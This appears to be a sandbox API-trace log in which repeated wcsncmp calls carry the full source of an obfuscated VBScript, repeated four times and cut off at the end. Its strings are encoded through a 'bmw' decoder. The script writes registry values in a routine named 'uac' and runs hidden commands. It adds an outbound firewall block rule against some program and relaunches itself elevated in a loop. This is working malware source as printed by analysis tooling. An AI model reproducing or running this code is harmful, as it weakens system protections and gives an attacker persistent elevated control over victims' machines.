bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.979] wcsncmp (_String1="st ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.979] wcsncmp (_String1="t ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.979] wcsncmp (_String1=" ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.979] wcsncmp (_String1="ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf 